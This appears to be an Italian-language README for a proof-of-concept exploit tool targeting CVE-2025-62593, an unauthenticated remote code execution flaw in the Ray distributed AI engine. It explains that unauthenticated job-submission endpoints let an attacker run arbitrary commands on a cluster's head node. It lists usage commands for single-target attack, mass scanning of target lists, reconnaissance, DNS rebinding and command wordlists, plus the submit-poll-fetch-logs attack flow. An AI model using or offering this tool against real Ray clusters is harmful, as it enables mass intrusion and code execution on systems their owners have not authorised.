
CVE-2025-62593 — Ray Unauthenticated RCE Exploit è una vulnerabilità di esecuzione remota di codice non autenticata nel motore di calcolo distribuito per l'IA Ray.
CVE-2025-62593 è una vulnerabilità di esecuzione remota di codice non autenticata
nel motore di calcolo AI distribuito Ray. La causa principale è l'assenza di
autenticazione sugli endpoint HTTP critici (/api/jobs, /api/job_agent/jobs).
Un attaccante può inviare un Job Ray il cui entrypoint è un comando arbitrario,
eseguendolo sul nodo head del cluster.
# Singolo target
python3 ray_rce_poc.py --target http://HOST:8265
# Scansione di massa (10 concorrenti)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Modalità ricognizione (enumerazione rapida)
python3 ray_rce_poc.py --recon --targets list.txt
# Modalità DNS rebinding
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# Scansione con wordlist
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs/ con entrypoint che esegue il comando target/api/jobs/ finché il job non raggiunge uno stato terminale/api/jobs/{id}/logs per recuperare l'output